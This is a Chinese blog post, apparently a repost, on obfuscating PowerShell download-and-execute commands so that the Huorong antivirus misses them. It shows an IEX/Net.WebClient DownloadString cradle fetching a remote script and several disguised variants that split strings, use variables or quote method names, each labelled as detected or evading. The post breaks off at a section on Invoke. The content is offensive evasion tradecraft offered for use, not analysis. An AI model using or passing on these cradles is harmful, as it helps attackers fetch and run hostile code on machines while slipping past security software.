当前位置:   article > 正文

powershell命令语句混淆免杀(bypass火绒)_iex (new-object system.net.webclient)

iex (new-object system.net.webclient)

基础混淆

原始语句(不免杀)
powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)"

AV:火绒

混淆测试
New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
  • 1

对于 DownloadString 函数中的 URL 字符串可以采用直接拼接的方式进行组合和拆分(不免杀)

powershll "IEX (New-Object Net.WebClient).DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
  • 1

定义一个变量,其值赋为New-Object(免杀)

powershell "$w=(New-Object Net.WebClient);IEX $w.DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
  • 1

用字符串DownloadString替换 DownloadString()函数(免杀)

powershell "IEX (New-Object Net.WebClient).('DownloadString')('h'+'ttp://127.0.0.1/a.ps1')"
  • 1

使用 Invoke 调用方法(免杀)


                
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/152890?site
推荐阅读
相关标签
  

闽ICP备14008679号